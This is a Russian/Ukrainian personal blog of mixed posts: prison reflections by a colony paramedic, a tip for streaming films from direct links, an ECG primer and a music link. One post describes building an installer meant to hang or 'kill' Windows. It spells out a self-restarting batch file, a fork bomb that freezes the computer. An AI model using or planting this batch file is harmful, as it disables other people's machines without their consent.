каждому свое...

У каждого своя тюрьма
У всех существуют свои моральные принципы как например если попал в тюрьму то это конец. Но для тех кто все же попал в это не столь отдаленное место и провел там определенный срок все принципы меняются. Там другая жизнь другие представления о жизни. Так как исчезают проблемы такие как работа,деньги, место проживания... :) , но появляется масса новых : что делать то время которое ты должен пребывать здесь в тюрьме, борьба с совестью (если таковая осталась),страх от всего нового и неизвестного который конечно проходит быстро (не у всех). Всех кто находится там обьединяет одна цель СВОБОДА. Хотя для тех кто попадает туда неоднократно в силу издержек так сказать професии если человек знает что он преступник и ничего лучше чем нарушать УК (уголовный кодекс) он не придумал для себя то отсидка в тюрьме воспринимается за должное. То есть сделал что-то плохое -попал в тюрьму пообщался набрался опыта вышел и продолжает начатое.Для тех же кто осознал свой поступок исправился ирешил жить без нарушений УК срок тянется целую вечность.
     В силу своей работы фельдшер колонии я видел многих людей которые настолько привыкли к тюрьме что выходить на свободу им не очень то и нужно так как нужно снова все менять искать работу ,жилье и.т.д .Снова доказывать жестокому миру чего он стоит. А в колонии он напримел имел определенный авторитет был чем-то занят. 
  Но у всех и тех кто бывал в местах лишения свободы и не бывал есть своя определенная ТЮРЬМА пусть простят меня  все за употребление данного термина но под ним я подразумеваю все те накрутки (личные определение ценностей) которые есть у всех. Для зк (заключенного) есть список чего нельзя в ИК (исправительная колония) ,а для нас есть свои ограничения которые порой бывают не обоснованными. Например беспокойство что о тебе подумают. Постоянное волнение ,а правильно ли я поступил ,а что об этом скажут.

Відтворення фільмів Онлайн

Вступ: 

- Спеціально для тих хто не може скачувати фільми за 2-3 хвилини або просто не хоче нагромаджувати велику кількість невідомих фільмів на вінчестері.

Одразу скажу тим в кого зараз виникла думка *я що не знаю як заходжу в Гугл вводжу назву фільму з припискою Онлайн і все* якщо так думаете то одразу закривайте статтю і ДАЛі НЕ читайте!!! lol

Для тої обраної касти яка все ж вирішила дізнатись суть починаємо:

1. Потрібно мати сайт з прямим посиланням на фільм тобто не файлообмінники Летітбіт, Deposit, хоча якщо э Gold аккаунт

і фільм не в архіві то можна спробувати... , а для мене краще всього використовувати прямі посилання наприклад на berloga.net, ex.ua є фільмі не Торрентові от за них і візьмемось.

2. Отже маємо посилання:  http://fs16.www.ex.ua/get/1337451/ya_lechu_22.avi якщо відкрити його в Браузері то  можна одразу скачувати а якщо вставити це посилання в плеєр KMPlayer в вкладення *Открыть адрес...* то можна почати перегляд одразу  podmig 

З.Ы : якщо комусь допомогла дана стаття прошу прошу писати в коментарях

        ТІ хТо й раніше це знав і не поділився ,або залишив купу гнівних коментарів з припискою *нащо воно треба є купа сервісів в яких і так фільм онлайн можна дивитись* то прошу відмітити що на багатьох сервісах купа реклами та й якість бажає кращого...

                    Питання пропозиції та подяки приймаютьсь за адресами : Вконтакті: http://vkontakte.ru/id38133588

                                                                                                            е-mail: 666b@i.ua

                                                                                                 


100%, 1 голос

0%, 0 голосов
Авторизируйтесь, чтобы проголосовать.

DJ Morphiziz -Kick that

ПЕСНЯ из НОВОГО АЛЬБОМА <a href="http://narod.ru/disk/14832036000/DJ%20Morphiziz%20-Kick%20that.mp3.html">DJ Morphiziz -Kick that.mp3</a> 

Слушать и ЗАЦЕНИТЬ обязательно!!!!!

Кардиограф

  • 23.06.09, 11:52
Электрокардиограмма представляет собой запись электрической деятельности сердца. Так же как и скелетная мускулатура, кардиомиоциты для своего сокращения подвергаются электрической стимуляции. Эта стимуляция называется активация или возбуждение.

Сердечная мышца является электрически заряженной даже в состоянии покоя. Внутренняя поверхность клеток миокарда имеет отрицательный заряд относительно их наружной поверхности — потенциал покоя. При электрической стимуляции клетки деполяризуются (потенциал покоя изменяет свой заряд на положительный) и сокращаются. По мере того как электрический импульс движется по миокарду, создаваемое им электрическое поле изменяется по силе и направлению. ЭКГ является графическим представлением этих изменений.
Сумма потенциалов действия миллионов кардиомиоцитов

Потенциал действия кардиомиоцитов усредняется. Окончательный результат такого взаимного усреднения миллионов микроскопических диполей регистрируется с помощью ЭКГ.
Электрическая работа сердца

В нормальных условиях электрическая активность сердца начинается в синусовом узле, частота разрядов которого определяет частоту ритма. В первую очередь деполяризуются и сокращаются предсердия, затем желудочки миокарда.

Электрический импульс достигает желудочков, распространяясь от синусового узла по миокарду предсердий. Достигает атриовентрикулярного узла (точнее — соединения), проходит через ствол пучка Гиса. Затем распространяется по правой и левой его ножкам, заканчиваясь в сети волокон Пуркинье.
Зубцы ЭКГ
Обозначения зубцов

Латинские буквы Q, R и S используются для следующих обозначений:

* Q — первая негативная (направленная вниз от изоэлектрической линии) волна, следующая за зубцом P. Если первое отклонение не направлено вниз — такой зубец отсутствует.
* R — первая позитивная (направленная вверх от изоэлектрической линии) волна, следующая за зубцом Q, или при его отсутствии — за зубцом P.
* S — первая негативная волна вслед за R

Все последующие позитивные и негативные отклонения в составе комплекса QRS обозначаются теми же самыми буквами с индексом ' (произносится — штрих) — R', S', R'', S'' etc.

Маленькие буквы q, r и s используются для обозначения зубцов небольшой (до 500 мкВ) амплитуды.
Какие процессы отображает каждый зубец

Зубец P отображает процесс деполяризации предсердий. Деполяризация начинается в клетках водителях ритма синусового (синоатриального) узла. Распространяется по проводящим пучкам к правому и левому предсердию. Процесс реполяризации предсердий обычно не виден на поверхностной ЭКГ. Однако выявляется при некоторых заболеваниях (инфаркт предсердий, перикардит, полная поперечная блокада).

Комплекс QRS представляет сумму потенциалов деполяризующихся кардиомиоцитов внутренних (субэндокард) и наружных (субэпикард) слоев миокарда. Субэндокардиальные участки деполяризуются несколько раньше субэпикардиальных, это приводит к формированию начального зубца Q.

Зубец T возникает в результате реполяризации желудочков. В этом периоде сердечная мышца находится в покое.

Волна U является непостоянным компонентом ЭКГ. Ее точное происхождение до сих пор остается неясным.
История ЭКГ

(Смотри также: История электрофизиологии и электрокардиографии)

История электрокардиографии насчитывает более 150 лет.

В 1843 немецкий физиолог Emil Du Bois-Reymond впервые описал потенциал действия, возникающий при мышечном сокращении. Он использовал высокочувствительный гальванометр (с общей длиной обмоток более 5 км). В его работах впервые встречаются литеры p, q, r и s для обозначения различных волн [1].

(Здесь существует некоторое противоречие. JW Hurst в своей замечательной статье Naming of the waves in the ECG, with a brief account of their genesis [2] упоминает Эйнтховена, первым предложившим эти обозначения.)

В 1850 M. Hoffa описал нерегулярные сокращения сердца собаки при воздействии на него электрического тока [3].

В 1887 английский физиолог Augustus D. Waller опубликовал первую ЭКГ человека [4, 5]. Он использовал капиллярный электрометр.

Голландский физиолог Уильям Эйнтховен предложил термин электрокардиограмма в 1893 г. В 1895 он опубликовал работу, в которой описывал использование гальванометра для визуализации электрической деятельности сердца. Струнный гальванометр был первым инструментом, применяемым в клинике.

В 1906 Эйнтховен опубликовал работу, в которой описано большинство ЭКГ изменений: блокада левой и правой ножки пучка Гиса, дилатация левого и правого предсердий, волна U, зазубренный QRS, желудочковая экстрасистолия, бигеминия, фибрилляция предсердий, полная AV блокада.
Электроды

(Смотри также: Поверхностные электрокардиографические отведения)

Электрическая деятельность сердца регистрируется с помощью системы десяти электродов, подключенных к определенным местам поверхности тела:

* LA — левая рука
* RA — правая рука
* N — правая нога
* F — левая нога

Полагают, что место расположения электродов на конечностях не влияет на форму ЭКГ. Однако, лучше сохранять единообразие в подключении электродов (например, не подключать электрод к левому плечу и правому запястью).

Расположение грудных электродов:

* V1 — четвертое межреберье справа от грудины
* V2 — четвертое межреберье слева от грудины
* V3 — посредине между V2 и V4
* V4 — пятое межреберье по среднеключичной линии
* V5 — та же горизонталь, что и V4, по передней подмышечной линии
* V6 — та же горизонталь, что V4 и V5, по средней подмышечной линии

Стандартные отведения от конечностей

* I — правая рука – левая рука
* II — правая рука – левая нога
* III — левая рука – левая нога

Простое правило для запоминания: отведение I + отведение III = отведение II. Это правило применимо ко всем зубцам ЭКГ. Пример: если в отведении I комплекс QrS имеет амплитуду 3 мм, а в отведении III — 9 мм, то амплитуда комплекса QRS во II отведении равна 12 мм.
Усиленные отведения от конечностей

* AVL — левая рука
* AVR — правая рука
* AVF — левая нога

Правило для усиленных отведений: aVR + aVL + aVF = 0
Грудные отведения

Грудные или прекордиальные отведения смотрят на сердце во фронтальной плоскости. Например, V1 расположено вблизи правого желудочка и правого предсердия, их сигналы имеют большую величину в этом отведении. Отведение V6 ближе к латеральной стенке левого желудочка.
Особые отведения

Для регистрации правых грудных отведений, грудные электроды располагают в зеркальном отражении.

Отведения V7, V8 и V9 используют для диагностики задних (заднебазальных) инфарктов миокарда.
Неправильное наложение электродов

(Смотри также: Технические_ошибки_и_артефакты_ЭКГ)

Иногда при записи ЭКГ электроды накладываются неправильно. При невнимательном анализе, это может приводить к некорректным заключениям. Результат неправильного наложения:

1. Правая нога правая рука
1. Отсутствие сигнала в отведении II

1. Правая рука левая рука
1. Взаимная реверсия отведений II и III
2. Взаимная реверсия отведений aVR и aVL

1. Левая рука левая нога
1. Взаимная реверсия отведений I и II
2. Взаимная реверсия отведений aVF и aVL
3. Инверсия отведения III

1. Правая рука левая нога
1. Инверсия отведений I, II и III
2. Взаимная реверсия отведений aVR и aVF

Артефакты

Артефакты могут иметь различное происхождение. Наиболее частыми являются:

* Движение пациента во время записи ЭКГ
* Электрические наводки

Убить Windows c помощью Inno Setup

Сейчас в этой статье я попытаюсь кратко изложить как при помощи инсталятора Inno Setup сделать установочный пакет который при желании сможет что нибудь установить и наглухо повесить или даже убить  Windows.

       Для начала написания убийственного* инсталятора нужно иметь:1. Inno Setup

                                                                   2.IStool

                                                                   3.XpTweaker (по желанию)

 Для простого зависания компа можно создать *bat файл и написать в нем:

title kill --заглавие окна батника

echo off -скрывает команды при выполнении :ie start kill.bat -старт этого же батничка который стартует опять себя и так до зависания компа. При желании                   можно вписать explorer.exe или taskmgr.exe ефект не меняется

goto :ie - переход к строчке : :ie для бесконечного запуска файла указаного в верхней командной строчке

                               КАК сделать убийственный* инсталятор 

                                                                        Дальше буДет!!!  


100%, 1 голос

0%, 0 голосов
Авторизируйтесь, чтобы проголосовать.

Эт безик!

ПРИВЕТ!!! Здрасьте Хой и.т.п.и.т.д ВСем кто каким-то чудом (может быть потерявшысь podmig podmig) зашол сюда!

 ЭтО Я типо автор блога!

Просьба если не тяжело ( если тяжело тоже!!lol lol! ) ГОЛОсовать за ФОТку!

А теперь продолжим сей оооЧЧЧень интереснющий БлОгГ ...

ПРОДОЛЖЕНИЕ СЛЕДУЕТ...


0%, 0 голосов

40%, 2 голоса

60%, 3 голоса
Авторизируйтесь, чтобы проголосовать.